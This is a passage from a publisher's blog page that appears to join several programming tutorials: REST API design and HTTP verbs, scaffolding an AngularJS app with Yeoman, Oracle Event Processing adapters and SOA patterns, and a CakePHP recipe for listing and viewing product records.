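For instance, a JSON representation of the single-book resource shown above might look like the following (a sketch; the field names are illustrative and not prescribed by REST itself):

{
    "isbn": "12345678",
    "title": "RESTful Java Patterns and Best Practices",
    "links": [
        { "rel": "self", "href": "http://foo.api.com/v1/library/books/isbn/12345678" }
    ]
}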
The following table summarizes the HTTP methods and the actions they take on a resource, using a collection of books in a library as a simple example:

HTTP method | Resource URI | Description
GET | /library/books | Gets a list of books
GET | /library/books/isbn/12345678 | Gets a book identified by ISBN "12345678"
POST | /library/books | Creates a new book order
DELETE | /library/books/isbn/12345678 | Deletes a book identified by ISBN "12345678"
PUT | /library/books/isbn/12345678 | Updates a specific book identified by ISBN "12345678"
PATCH | /library/books/isbn/12345678 | Can be used to do a partial update for a book identified by ISBN "12345678"

REST and statelessness

REST is bound by the principle of statelessness. Each request from the client to the server must carry all the details needed to understand the request. This helps to improve visibility, reliability, and scalability for requests:

Visibility is improved, as the system monitoring the requests does not have to look beyond one request to get details.
Reliability is improved, as there is no check-pointing/resuming to be done in case of partial failures.
Scalability is improved, as the number of requests that can be processed increases because the server is not responsible for storing any state.

Roy Fielding's dissertation on the REST architectural style provides details on the statelessness of REST; check http://www.ics.uci.edu/~fielding/pubs/dissertation/rest_arch_style.htm

With this initial introduction to the basics of REST, we shall cover the different maturity levels and where REST falls among them in the following section.

Richardson Maturity Model

The Richardson Maturity Model is a model developed by Leonard Richardson. It talks about the basics of REST in terms of resources, verbs, and hypermedia controls. The starting point for the maturity model is to use the HTTP layer as the transport.

Level 0 – Remote Procedure Invocation

This level contains SOAP or XML-RPC sending data as POX (Plain Old XML). Only POST methods are used. This is the most primitive way of building SOA applications, with a single POST method and XML used to communicate between services.

Level 1 – REST resources

This uses POST methods and, instead of using a function and passing arguments, uses the REST URIs. It still uses only one HTTP method. It is better than Level 0 in that it breaks a complex functionality into multiple resources with one method.

Level 2 – more HTTP verbs

This level uses other HTTP verbs such as GET, HEAD, DELETE, and PUT along with POST methods. Level 2 is the real use case of REST, which advocates using different verbs based on the HTTP request methods, and the system can have multiple resources.

Level 3 – HATEOAS

Hypermedia as the Engine of Application State (HATEOAS) is the most mature level of Richardson's model. The responses to client requests contain hypermedia controls, which can help the client decide what action to take next. Level 3 encourages easy discoverability and makes it easy for responses to be self-explanatory.

Safety and Idempotence

This section discusses safe and idempotent methods in detail.

Safe methods

Safe methods are methods that do not change state on the server. GET and HEAD are safe methods. For example, GET /v1/coffees/orders/1234 is a safe request. Safe methods can be cached. The PUT method is not safe, as it will create or modify a resource on the server. The POST method is not safe for the same reason. The DELETE method is not safe, as it deletes a resource on the server.
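Because safe methods have no side effects on the server, intermediaries are free to cache their responses. A sketch of such an exchange (the headers and body shown are illustrative):

GET /v1/coffees/orders/1234 HTTP/1.1
Host: bar.api.com

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: application/json

{"orderId": 1234, "status": "brewing"}

Repeating the same GET within the hour can be served straight from a cache, with no second trip to the origin server.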
Idempotent methods

An idempotent method is a method that will produce the same result irrespective of how many times it is called. For example, the GET method is idempotent, as multiple calls to the GET resource will always return the same response. The PUT method is idempotent, as calling it multiple times will update the same resource and not change the outcome. POST is not idempotent, and calling the POST method multiple times can have different results and will result in the creation of new resources. DELETE is idempotent because once the resource is deleted, it is gone, and calling the method multiple times will not change the outcome.

HTTP verbs and REST

HTTP verbs inform the server what to do with the data sent as part of the URL.

GET

GET is the simplest verb of HTTP, which enables access to a resource. Whenever the client clicks a URL in the browser, it sends a GET request to the address specified by the URL. GET is safe and idempotent. GET requests are cached. Query parameters can be used in GET requests. For example, a simple GET request is as follows:

curl http://api.foo.com/v1/user/12345

POST

POST is used to create a resource. POST requests are neither idempotent nor safe. Multiple invocations of POST requests can create multiple resources. POST requests should invalidate a cache entry if one exists. Query parameters with POST requests are not encouraged. For example, a POST request to create a user can be as follows:

curl -X POST -d '{"name":"John Doe","username":"jdoe","phone":"412-344-5644"}' http://api.foo.com/v1/user

PUT

PUT is used to update a resource. PUT is idempotent but not safe. Multiple invocations of PUT requests should produce the same results by updating the resource. PUT requests should invalidate the cache entry if one exists. For example, a PUT request to update a user can be as follows:

curl -X PUT -d '{"phone":"413-344-5644"}' http://api.foo.com/v1/user

DELETE

DELETE is used to delete a resource. DELETE is idempotent but not safe. DELETE is idempotent because, based on RFC 2616, "the side effects of N > 0 identical requests is the same as for a single request". This means that once the resource is deleted, calling DELETE multiple times will get the same response. For example, a request to delete a user is as follows:

curl -X DELETE http://foo.api.com/v1/user/1234

HEAD

HEAD is similar to a GET request. The difference is that only the HTTP headers are returned and no content. HEAD is idempotent and safe. For example, a request to send a HEAD request with curl is as follows:

curl -X HEAD http://foo.api.com/v1/user

It can be useful to send a HEAD request to see whether the resource has changed before trying to get a large representation using a GET request.

PUT vs POST

According to the RFC, the difference between PUT and POST is in the Request URI. The URI identified by POST defines the entity that will handle the POST request. The URI in the PUT request includes the entity in the request. So, POST /v1/coffees/orders means to create a new resource and return an identifier to describe the resource. In contrast, PUT /v1/coffees/orders/1234 means to update the resource identified by "1234" if it exists, or else create a new order and use the URI orders/1234 to identify it.

Best practices when designing resources

This section highlights some of the best practices when designing RESTful resources: The API developer should use nouns to identify and navigate through resources, and HTTP verbs for the operations performed on them. For example, the URI /user/1234/books is better than /user/1234/getBook.
Use associations in the URIs to identify sub resources. For example to get the authors for book 5678 for user 1234 use the following URI /user/1234/books/5678/authors. For specific variations use query parameters. For example to get all the books with 10 reviews /user/1234/books?reviews_counts=10. Allow partial responses as part of query parameters if possible. An example of this case is to get only the name and age of a user, the client can specify, ?fields as a query parameter and specify the list of fields which should be sent by the server in the response using the URI /users/1234?fields=name,age. Have defaults for the output format for the response incase the client does not specify which format it is interested in. Most API developers choose to send json as the default response mime type. Have camelCase or use _ for attribute names. Support a standard API for count for example users/1234/books/count in case of collections so the client can get the idea of how many objects can be expected in the response. This will also help the client, with pagination queries. Support a pretty printing option users/1234?pretty_print. Also it is a good practice to not cache queries with pretty print query parameter. Avoid chattiness by being as verbose as possible in the response. This is because if the server does not provide enough details in the response the client needs to make more calls to get additional details. That is a waste of network resources as well as counts against the client’s rate limits. REST architecture components This section will cover the various components that must be considered when building RESTful APIs As seen in the preceding screenshot, REST services can be consumed from a variety of clients and applications running on different platforms and devices like mobile devices, web browsers etc. These requests are sent through a proxy server. The HTTP requests will be sent to the resources and based on the various CRUD operations the right HTTP method will be selected. On the response side there can be Pagination, to ensure the server sends a subset of results. Also the server can do Asynchronous processing thus improving responsiveness and scale. There can be links in the response, which deals with HATEOAS. Here is a summary of the various REST architectural components: HTTP requests use REST API with HTTP verbs for the uniform interface constraint Content negotiation allows selecting a representation for a response when there are multiple representations available. Logging helps provide traceability to analyze and debug issues Exception handling allows sending application specific exceptions with HTTP codes Authentication and authorization with OAuth2.0 gives access control to other applications, to take actions without the user having to send their credentials Validation provides support to send back detailed messages with error codes to the client as well as validations for the inputs received in the request. Rate limiting ensures the server is not burdened with too many requests from single client Caching helps to improve application responsiveness. Asynchronous processing enables the server to asynchronously send back the responses to the client. Micro services which comprises breaking up a monolithic service into fine grained services HATEOAS to improve usability, understandability and navigability by returning a list of links in the response Pagination to allow clients to specify items in a dataset that they are interested in. 
The REST Architectural components in the image can be chained one after the other as shown priorly. For example, there can be a filter chain, consisting of filters related with Authentication, Rate limiting, Caching, and Logging. This will take care of authenticating the user, checking if the requests from the client are within rate limits, then a caching filter which can check if the request can be served from the cache respectively. This can be followed by a logging filter, which can log the details of the request. For more details, check RESTful Patterns and best practices.
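To make the chaining concrete, here is a minimal Express-style sketch of such a filter chain; the middleware names and stub bodies are our own illustration, not code from the book:

var express = require('express');
var app = express();

// Each cross-cutting concern is a small middleware; the order mirrors the chain above.
function authenticate(req, res, next) { /* verify the OAuth 2.0 token */ next(); }
function rateLimit(req, res, next) { /* reject clients that exceed their quota */ next(); }
function cache(req, res, next) { /* serve the response from cache when it is fresh */ next(); }
function logRequest(req, res, next) { /* record the method, path, and latency */ next(); }

app.use(authenticate);
app.use(rateLimit);
app.use(cache);
app.use(logRequest);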
AngularJS Project

Packt
19 Aug 2014
14 min read
This article by Jonathan Spratley, the author of book, Learning Yeoman, covers the steps of how to create an AngularJS project and previewing our application. (For more resources related to this topic, see here.) Anatomy of an Angular project Generally in a single page application (SPA), you create modules that contain a set of functionality, such as a view to display data, a model to store data, and a controller to manage the relationship between the two. Angular incorporates the basic principles of the MVC pattern into how it builds client-side web applications. The major Angular concepts are as follows: Templates : A template is used to write plain HTML with the use of directives and JavaScript expressions Directives : A directive is a reusable component that extends HTML with the custom attributes and elements Models : A model is the data that is displayed to the user and manipulated by the user Scopes : A scope is the context in which the model is stored and made available to controllers, directives, and expressions Expressions : An expression allows access to variables and functions defined on the scope Filters : A filter formats data from an expression for visual display to the user Views : A view is the visual representation of a model displayed to the user, also known as the Document Object Model (DOM) Controllers : A controller is the business logic that manages the view Injector : The injector is the dependency injection container that handles all dependencies Modules : A module is what configures the injector by specifying what dependencies the module needs Services : A service is a piece of reusable business logic that is independent of views Compiler : The compiler handles parsing templates and instantiating directives and expressions Data binding : Data binding handles keeping model data in sync with the view Why Angular? AngularJS is an open source JavaScript framework known as the Superheroic JavaScript MVC Framework, which is actively maintained by the folks over at Google. Angular attempts to minimize the effort in creating web applications by teaching the browser's new tricks. This enables the developers to use declarative markup (known as directives or expressions) to handle attaching the custom logic behind DOM elements. Angular includes many built-in features that allow easy implementation of the following: Two-way data binding in views using double mustaches {{ }} DOM control for repeating, showing, or hiding DOM fragments Form submission and validation handling Reusable HTML components with self-contained logic Access to RESTful and JSONP API services The major benefit of Angular is the ability to create individual modules that handle specific responsibilities, which come in the form of directives, filters, or services. This enables developers to leverage the functionality of the custom modules by passing in the name of the module in the dependencies. Creating a new Angular project Now it is time to build a web application that uses some of Angular's features. The application that we will be creating will be based on the scaffold files created by the Angular generator; we will add functionality that enables CRUD operations on a database. Installing the generator-angular To install the Yeoman Angular generator, execute the following command: $ npm install -g generator-angular For Karma testing, the generator-karma needs to be installed. 
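If it is not already present, it can be installed globally in the same way as the Angular generator:

$ npm install -g generator-karma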
Scaffolding the application To scaffold a new AngularJS application, create a new folder named learning-yeoman-ch3 and then open a terminal in that location. Then, execute the following command: $ yo angular --coffee This command will invoke the AngularJS generator to scaffold an AngularJS application, and the output should look similar to the following screenshot: Understanding the directory structure Take a minute to become familiar with the directory structure of an Angular application created by the Yeoman generator: app: This folder contains all of the front-end code, HTML, JS, CSS, images, and dependencies: images: This folder contains images for the application scripts: This folder contains AngularJS codebase and business logic: app.coffee: This contains the application module definition and routing controllers: Custom controllers go here: main.coffee: This is the main controller created by default directives: Custom directives go here filters: Custom filters go here services: Reusable application services go here styles: This contains all CSS/LESS/SASS files: main.css: This is the main style sheet created by default views: This contains the HTML templates used in the application main.html: This is the main view created by default index.html: This is the applications' entry point bower_components: This folder contains client-side dependencies node_modules: This contains all project dependencies as node modules test: This contains all the tests for the application: spec: This contains unit tests mirroring structure of the app/scripts folder karma.conf.coffee: This file contains the Karma runner configuration Gruntfile.js: This file contains all project tasks package.json: This file contains project information and dependencies bower.json: This file contains frontend dependency settings The directories (directives, filters, and services) get created when the subgenerator is invoked. Configuring the application Let's go ahead and create a configuration file that will allow us to store the application wide properties; we will use the Angular value services to reference the configuration object. Open up a terminal and execute the following command: $ yo angular:value Config This command will create a configuration service located in the app/scripts/services directory. This service will store global properties for the application. For more information on Angular services, visit http://goo.gl/Q3f6AZ. Now, let's add some settings to the file that we will use throughout the application. Open the app/scripts/services/config.coffee file and replace with the following code: 'use strict' angular.module('learningYeomanCh3App').value('Config', Config = baseurl: document.location.origin sitetitle: 'learning yeoman' sitedesc: 'The tutorial for Chapter 3' sitecopy: '2014 Copyright' version: '1.0.0' email: '[email protected]' debug: true feature: title: 'Chapter 3' body: 'A starting point for a modern angular.js application.' image: 'http://goo.gl/YHBZjc' features: [ title: 'yo' body: 'yo scaffolds out a new application.' image: 'http://goo.gl/g6LO99' , title: 'Bower' body: 'Bower is used for dependency management.' image: 'http://goo.gl/GpxBAx' , title: 'Grunt' body: 'Grunt is used to build, preview and test your project.' 
image: 'http://goo.gl/9M00hx' ] session: authorized: false user: null layout: header: 'views/_header.html' content: 'views/_content.html' footer: 'views/_footer.html' menu: [ title: 'Home', href: '/' , title: 'About', href: '/about' , title: 'Posts', href: '/posts' ] ) The preceding code does the following: It creates a new Config value service on the learningYeomanCh3App module The baseURL property is set to the location where the document originated from The sitetitle, sitedesc, sitecopy, and version attributes are set to default values that will be displayed throughout the application The feature property is an object that contains some defaults for displaying a feature on the main page The features property is an array of feature objects that will display on the main page as well The session property is defined with authorized set to false and user set to null; this value gets set to the current authenticated user The layout property is an object that defines the paths of view templates, which will be used for the corresponding keys The menu property is an array that contains the different pages of the application Usually, a generic configuration file is created at the top level of the scripts folder for easier access. Creating the application definition During the initial scaffold of the application, an app.coffee file is created by Yeoman located in the app/scripts directory. The scripts/app.coffee file is the definition of the application, the first argument is the name of the module, and the second argument is an array of dependencies, which come in the form of angular modules and will be injected into the application upon page load. The app.coffee file is the main entry point of the application and does the following: Initializes the application module with dependencies Configures the applications router Any module dependencies that are declared inside the dependencies array are the Angular modules that were selected during the initial scaffold. Consider the following code: 'use strict' angular.module('learningYeomanCh3App', [ 'ngCookies', 'ngResource', 'ngSanitize', 'ngRoute' ]) .config ($routeProvider) -> $routeProvider .when '/', templateUrl: 'views/main.html' controller: 'MainCtrl' .otherwise redirectTo: '/' The preceding code does the following: It defines an angular module named learningYeomanCh3App with dependencies on the ngCookies, ngSanitize, ngResource, and ngRoute modules The .config function on the module configures the applications' routes by passing route options to the $routeProvider service Bower downloaded and installed these modules during the initial scaffold. Creating the application controller Generally, when creating an Angular application, you should define a top-level controller that uses the $rootScope service to configure some global application wide properties or methods. To create a new controller, use the following command: $ yo angular:controller app This command will create a new AppCtrl controller located in the app/scripts/controllers directory. 
Open the newly created controller file (app/scripts/controllers/app.coffee) and replace its contents with the following code:

'use strict'
angular.module('learningYeomanCh3App')
  .controller('AppCtrl', ($rootScope, $cookieStore, Config) ->
    $rootScope.name = 'AppCtrl'
    App = angular.copy(Config)
    App.session = $cookieStore.get('App.session')
    window.App = $rootScope.App = App)

The preceding code does the following:

It creates a new AppCtrl controller with dependencies on the $rootScope, $cookieStore, and Config modules
Inside the controller definition, an App variable is copied from the Config value service
The session property is set to the App.session cookie, if available

Creating the application views

The Angular generator will create the application's index.html view, which acts as the container for the entire application. The index view is used as the shell for the other views of the application; the router handles mapping URLs to views, which then get injected into the element that declares the ng-view directive.

Modifying the application's index.html

Let's modify the default view that was created by the generator. Open the app/index.html file and add the content right below the HTML comment left by the generator. The structure of the application will consist of an article element that contains a header, a content section, and a footer:

<article id="app" ng-controller="AppCtrl" class="container">
  <header id="header" ng-include="App.layout.header"></header>
  <section id="content" class="view-animate-container">
    <div class="view-animate" ng-view=""></div>
  </section>
  <footer id="footer" ng-include="App.layout.footer"></footer>
</article>

In the preceding code:

The article element declares the ng-controller directive to the AppCtrl controller
The header element uses an ng-include directive that specifies what template to load, in this case, the header property on the App.layout object
The div element has the view-animate-container class that will allow the use of CSS transitions
The ng-view attribute directive will inject the current route's view template into the content
The footer element uses an ng-include directive to load the footer specified in the App.layout.footer property

Use ng-include to load partials, which allows you to easily swap out templates.

Creating Angular partials

Use the yo angular:view command to create view partials that will be included in the application's main layout. So far, we need to create three partials that the index view (app/index.html) will be consuming from the App.layout property on the $rootScope service that defines the location of the templates. Names of view partials typically begin with an underscore (_).

Creating the application's header

The header partial will contain the site title and navigation of the application. Open a terminal and execute the following command:

$ yo angular:view _header

This command creates a new view template file in the app/views directory. Open the app/views/_header.html file and add the following contents:

<div class="header">
  <ul class="nav nav-pills pull-right">
    <li ng-repeat="item in App.menu" ng-class="{'active': App.location.path() === item.href}">
      <a ng-href="#{{item.href}}">{{item.title}}</a>
    </li>
  </ul>
  <h3 class="text-muted">{{ App.sitetitle }}</h3>
</div>

The preceding code does the following:

It uses the {{ }} data binding syntax to display App.sitetitle in a heading element
The ng-repeat directive is used to repeat each item in the App.menu array defined on $rootScope

Creating the application's footer

The footer partial will contain the copyright message and current version of the application.
Open the terminal and execute the following command: $ yo angular:view _footer This command creates a view template file in the app/views directory. Open the app/views/_footer.html file and add the following markup: <div class="app-footer container clearfix">     <span class="app-sitecopy pull-left">       {{ App.sitecopy }}     </span>     <span class="app-version pull-right">       {{ App.version }}     </span> </div> The preceding code does the following: It uses a div element to wrap two span elements The first span element contains data binding syntax referencing App.sitecopy to display the application's copyright message The second span element also contains data binding syntax to reference App.version to display the application's version Customizing the main view The Angular generator creates the main view during the initial scaffold. Open the app/views/main.html file and replace with the following markup: <div class="jumbotron">     <h1>{{ App.feature.title }}</h1>     <img ng-src="{{ App.feature.image  }}"/>       <p class="lead">       {{ App.feature.body }}       </p>   </div>     <div class="marketing">   <ul class="media-list">         <li class="media feature" ng-repeat="item in App.features">        <a class="pull-left" href="#">           <img alt="{{ item.title }}"                       src="http://placehold.it/80x80"                       ng-src="{{ item.image }}"            class="media-object"/>        </a>        <div class="media-body">           <h4 class="media-heading">{{item.title}}</h4>           <p>{{ item.body }}</p>        </div>         </li>   </ul> </div> The preceding code does the following: At the top of the view, we use the {{ }} data binding syntax to display the title and body properties declared on the App.feature object Next, inside the div.marketing element, another div element is declared with the ng-repeat directive to loop for each item in the App.features property Then, using the {{ }} data binding syntax wrapped around the title and body properties from the item being repeated, we output the values Previewing the application To preview the application, execute the following command: $ grunt serve Your browser should open displaying something similar to the following screenshot: Download the AngularJS Batarang (http://goo.gl/0b2GhK) developer tool extension for Google Chrome for debugging. Summary In this article, we learned the concepts of AngularJS and how to leverage the framework in a new or existing project. Resources for Article: Further resources on this subject: Best Practices for Modern Web Applications [article] Spring Roo 1.1: Working with Roo-generated Web Applications [article] Understand and Use Microsoft Silverlight with JavaScript [article]
Additional SOA Patterns – Supporting Composition Controllers

Packt
14 Aug 2014
10 min read
In this article by Sergey Popov, author of the book Applied SOA Patterns on the Oracle Platform, we will learn some complex SOA patterns, realized on very interesting Oracle products: Coherence and Oracle Event Processing. (For more resources related to this topic, see here.) We have to admit that for SOA Suite developers and architects (especially from the old BPEL school), the Oracle Event Processing platform could be a bit outlandish. This could be the reason why some people oppose service-oriented and event-driven architecture, or see them as different architectural approaches. The situation is aggravated by the abundance of the acronyms flying around such as EDA EPN, EDN, CEP, and so on. Even here, we use EPN and EDN interchangeably, as Oracle calls it event processing, and generically, it is used in an event delivery network.   The main argument used for distinguishing SOA and EDN is that SOA relies on the application of a standardized contract principle, whereas EDN has to deal with all types of events. This is true, and we have mentioned this fact before. We also mentioned that we have to declare all the event parameters in the form of key-value pairs with their types in <event-type-repository>. We also mentioned that the reference to the event type from the event type repository is not mandatory for a standard EPN adapter, but it's essential when you are implementing a custom inbound adapter in the EPN framework, which is an extremely powerful Java-based feature. As long as it's Java, you can do practically everything! Just follow the programming flow explained in the Oracle documentation; see the EP Input Adapter Implementation section:   import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import com.bea.wlevs.ede.api.EventProperty; import com.bea.wlevs.ede.api.EventRejectedException; import com.bea.wlevs.ede.api.EventType;   import com.bea.wlevs.ede.api.EventTypeRepository; import com.bea.wlevs.ede.api.RunnableBean;   import com.bea.wlevs.ede.api.StreamSender; import com.bea.wlevs.ede.api.StreamSink; import com.bea.wlevs.ede.api.StreamSource; import com.bea.wlevs.util.Service;   import java.lang.RuntimeException;   public class cargoBookingAdapter implements RunnableBean, StreamSource, StreamSink   {   static final Log v_logger = LogFactory. getLog("cargoBookingAdapter");   private String v_eventTypeName; private EventType v_eventType;        private StreamSender v_eventSender;   private EventTypeRepository v_EvtRep = null; public cargoBookingAdapter(){   super();   }   /**   *  Called by the server to pass in the name of the event   *  v_EvTypee to which event data should be bound.   */   public void setEventType(String v_EvType){ v_eventTypeName = v_EvType; }   /**   *  Called by the server to set an event v_EvTypee   *  repository instance that knows about event   *  v_EvTypees configured for this application   *   *  This repository instance will be used to retrieve an   *  event v_EvTypee instance that will be populated   *  with event data retrieved from the event data file   *  @param etr The event repository.   */   @Service(filter = EventTypeRepository.SERVICE_FILTER)   public void setEventTypeRepository(EventTypeRepository etr){ v_EvtRep = etr;   }   /**   *  Executes to retrieve raw event data and   *  create event v_EvTypee instances from it, then   *  sends the events to the next stage in the   *  EPN.   *  This method, implemented from the RunnableBean   *  interface, executes when this adapter instance   *  is active.   
*/   public void run()   {   if (v_EvtRep == null){   throw new RuntimeException("EventTypeRepository is   not set");   }   //  Get the event v_EvTypee from the repository by using   //  the event v_EvTypee name specified as a property of   //  this adapter in the EPN assembly file.   v_eventType = v_EvtRep.getEventType(v_eventTypeName); if (v_eventType == null){ throw new RuntimeException("EventType(" + v_eventType + ") is not found.");     }   /**   *   Actual Adapters implementation:   *             *  1. Create an object and assign to it   *      an event v_EvTypee instance generated   *      from event data retrieved by the   *      reader   *   *  2. Send the newly created event v_EvTypee instance   *      to a downstream stage that is   *      listening to this adapter.   */   }   }   }   The presented code snippet demonstrates the injection of a dependency into the Adapter class using the setEventTypeRepository method, implanting the event type definition that is specified in the adapter's configuration.   So, it appears that we, in fact, have the data format and model declarations in an XML form for the event, and we put some effort into adapting the inbound flows to our underlying component. Thus, the Adapter Framework is essential in EDN, and dependency injection can be seen here as a form of dynamic Data Model/Format Transformation of the object's data. Going further, just following the SOA reusabilityprinciple, a single adapter can be used in multiple event-processing networks and for that, we can employ the Adapter Factory pattern discussed earlier (although it's not an official SOA pattern, remember?) For that, we will need the Adapter Factory class and the registration of this factory in the EPN assembly file with a dedicated provider name, which we will use further in applications, employing the instance of this adapter. You must follow the OSGi service registry rules if you want to specify additional service properties in the <osgi:service interface="com.bea.wlevs.ede.api.AdapterFactory"> section and register it only once as an OSGi service.   We also use Asynchronous Queuing and persistence storage to provide reliable delivery of events aggregation to event subscribers, as we demonstrated in the previous paragraph. Talking about aggregation on our CQL processors, we have practically unlimited possibilities to merge and correlate various event sources, such as streams:   <query id="cargoQ1"><![CDATA[   select * from CragoBookingStream, VoyPortCallStream   where CragoBookingStream.POL_CODE = VoyPortCallStream.PORT_CODE and VoyPortCallStream.PORT_CALL_PURPOSE ="LOAD" ]]></query> Here, we employ Intermediate Routing (content-based routing) to scale and balance our event processors and also to achieve a desirable level of high availability. Combined together, all these basic SOA patterns are represented in the Event-Driven Network that has Event-Driven Messaging as one of its forms.   Simply put, the entire EDN has one main purpose: effective decoupling of event (message) providers and consumers (Loose Coupling principle) with reliable event identification and delivering capabilities. So, what is it really? It is a subset of the Enterprise Service Bus compound SOA pattern, and yes, it is a form of an extended Publish-Subscribe pattern.   Some may say that CQL processors (or bean processors) are not completely aligned with the classic ESB pattern. 
Well, you will not find OSB XQuery in the canonical ESB patterns catalog either; it's just a tool that supports ESB VETRO operations in this matter. In ESB, we can also call Java beans when it's necessary for message processing; for instance, doing complex sorts in Java Collections is far easier than in XML/XSLT, and it is worth the serialization/deserialization efforts. In a similar way, EDN extends the classic ESB by providing the following functionalities:

• Continuous Query Language
• It operates on multiple streams of disparate data
• It joins the incoming data with persisted data
• It has the ability to plug in any type of adapter

Combined together, all these features can cover almost any range of practical challenges, and the logistics example we used here in this article is probably too insignificant for such a powerful event-driven platform; however, for a more insightful look at Oracle CEP, refer to Getting Started with Oracle Event Processing 11g, Alexandre Alves, Robin J. Smith, Lloyd Williams, Packt Publishing. Using exactly the same principles and patterns, you can employ the already existing tools in your arsenal. The world is apparently bigger, and this tool can demonstrate all its strength in the following use cases:

• As already mentioned, Cablecom Enterprise strives to improve the overall customer experience (not only for VOD). It does so by gathering and aggregating information about user preferences through the purchasing history, watch lists, channel switching, activity in social networks, search history and used meta tags in search, other user experiences from the same target group, upcoming related public events (shows, performances, or premieres), and even the duration of the cursor's position over certain elements of corporate web portals. The task is complex and comprises many activities, including meta tag updates in metadata storage that depend on new findings for predicting trends, and so on; however, here we can tolerate (to some extent) events that aren't processed or are not received.

• For bank transaction monitoring, we do not have such a luxury. All online events must be accounted for and processed with the maximum speed possible. If the last transaction with your credit card was an ATM cash withdrawal at Bond Street in London, and 5 minutes later the same card is used to purchase expensive jewellery online with a peculiar delivery address, then someone should flag the card with a possible fraud case and contact the card holder (a simplified CQL sketch of this kind of correlation follows at the end of this section). This is the simplest example that we can provide. When it comes to money laundering tracking cases in our borderless world, a decision-parsing tree based on all possible correlated events would require all the pages of this book, and you would need a strong magnifying glass to read it; the stratagem of the web nodes and links would drive even the most worldly-wise spider crazy.

For these mentioned use cases, Oracle EPN is simply compulsory, with some spice like Coherence for cache management and adequate hardware. It would be prudent to avoid implementing homebrewed solutions (without dozens of years of relevant experience), and following the SOA design patterns is essential.

Let's now assemble all that we discussed in the preceding paragraphs in one final figure.
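To make the fraud-monitoring scenario more concrete, here is a minimal CQL sketch of such a correlation, written in the same style as the cargoQ1 query shown earlier. The stream names, property names, and the 5-minute window are illustrative assumptions, not definitions taken from this book:

<query id="fraudQ1"><![CDATA[
  select atm.CARD_ID, atm.ATM_LOCATION, web.DELIVERY_ADDRESS
  from AtmWithdrawalStream [range 5 minutes] as atm,
       OnlinePurchaseStream [now] as web
  where atm.CARD_ID = web.CARD_ID
]]></query>

Each online purchase event is joined against the ATM withdrawals seen in the last 5 minutes on the same card; any match can then be routed to a downstream alerting stage for review.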
Installation routines will not give you any trouble; just download and install OEPE 3.5, add the CEP components for Eclipse, and you are done with the client/dev environment. The installation of the server should not pose many difficulties either (http://docs.oracle.com/cd/E28280_01/doc.1111/e14476/install.htm#CEPGS472). When the server is up and running, you can register it in Eclipse (1). The graphical interface will support you in assembling event-handling applications from adapters, processors, channels, and event beans; however, knowledge of the internal organization of the XML config and application assembly files (as demonstrated in the earlier code snippets) is always beneficial. In addition to the Eclipse development environment, you have the CEP server web console (visualizer) with almost identical functionalities, which gives you a quick hand with practically all CQL constructs (2).

Parallel Complex Events Processing

Lightning Introduction

Packt
13 Aug 2014
11 min read
In this article by Jorge González and James Watts, the authors of CakePHP 2 Application Cookbook, we will cover the following recipes: listing and viewing records, adding and editing records, deleting records, adding a login, and including a plugin. (For more resources related to this topic, see here.) CakePHP is a web framework for rapid application development (RAD), which admittedly covers a wide range of areas and possibilities. However, at its core, it provides a solid architecture for the CRUD (create/read/update/delete) interface. This chapter is a set of quick-start recipes to dive head first into using the framework and build out a simple CRUD around product management. If you want to try the code examples on your own, make sure that you have CakePHP 2.5.2 installed and configured to use a database. Listing and viewing records To begin, we'll need a way to view the products available and also allow the option to select and view any one of those products. In this recipe, we'll create a listing of products as well as a page where we can view the details of a single product. Getting ready To go through this recipe, we'll first need a table of data to work with. So, create a table named products using the following SQL statement:

CREATE TABLE products (
  id VARCHAR(36) NOT NULL,
  name VARCHAR(100),
  details TEXT,
  available TINYINT(1) UNSIGNED DEFAULT 1,
  created DATETIME,
  modified DATETIME,
  PRIMARY KEY(id)
);

We'll then need some sample data to test with, so now run this SQL statement to insert some products:

INSERT INTO products (id, name, details, available, created, modified)
VALUES
('535c460a-f230-4565-8378-7cae01314e03', 'Cake', 'Yummy and sweet', 1, NOW(), NOW()),
('535c4638-c708-4171-985a-743901314e03', 'Cookie', 'Browsers love cookies', 1, NOW(), NOW()),
('535c49d9-917c-4eab-854f-743801314e03', 'Helper', 'Helping you all the way', 1, NOW(), NOW());

Before we begin, we'll also need to create ProductsController. To do so, create a file named ProductsController.php in app/Controller/ and add the following content:

<?php
App::uses('AppController', 'Controller');

class ProductsController extends AppController {
    public $helpers = array('Html', 'Form');
    public $components = array('Session', 'Paginator');
}

Now, create a directory named Products/ in app/View/. Then, in this directory, create one file named index.ctp and another named view.ctp. How to do it...
Perform the following steps: Define the pagination settings to sort the products by adding the following property to the ProductsController class:

public $paginate = array('limit' => 10);

Add the following index() method in the ProductsController class:

public function index() {
    $this->Product->recursive = -1;
    $this->set('products', $this->paginate());
}

Introduce the following content in the index.ctp file that we created:

<h2><?php echo __('Products'); ?></h2>
<table>
  <tr>
    <th><?php echo $this->Paginator->sort('id'); ?></th>
    <th><?php echo $this->Paginator->sort('name'); ?></th>
    <th><?php echo $this->Paginator->sort('created'); ?></th>
  </tr>
  <?php foreach ($products as $product): ?>
  <tr>
    <td><?php echo $product['Product']['id']; ?></td>
    <td><?php
      echo $this->Html->link($product['Product']['name'],
        array('controller' => 'products', 'action' => 'view',
        $product['Product']['id']));
    ?></td>
    <td><?php echo $this->Time->nice($product['Product']['created']); ?></td>
  </tr>
  <?php endforeach; ?>
</table>
<div><?php echo $this->Paginator->counter(array('format' => __('Page {:page} of {:pages}, showing {:current} records out of {:count} total, starting on record {:start}, ending on {:end}'))); ?></div>
<div>
  <?php
    echo $this->Paginator->prev(__('< previous'), array(), null, array('class' => 'prev disabled'));
    echo $this->Paginator->numbers(array('separator' => ''));
    echo $this->Paginator->next(__('next >'), array(), null, array('class' => 'next disabled'));
  ?>
</div>

Returning to the ProductsController class, add the following view() method to it:

public function view($id) {
    if (!($product = $this->Product->findById($id))) {
        throw new NotFoundException(__('Product not found'));
    }
    $this->set(compact('product'));
}

Introduce the following content in the view.ctp file:

<h2><?php echo h($product['Product']['name']); ?></h2>
<p><?php echo h($product['Product']['details']); ?></p>
<dl>
  <dt><?php echo __('Available'); ?></dt>
  <dd><?php echo __((bool)$product['Product']['available'] ? 'Yes' : 'No'); ?></dd>
  <dt><?php echo __('Created'); ?></dt>
  <dd><?php echo $this->Time->nice($product['Product']['created']); ?></dd>
  <dt><?php echo __('Modified'); ?></dt>
  <dd><?php echo $this->Time->nice($product['Product']['modified']); ?></dd>
</dl>

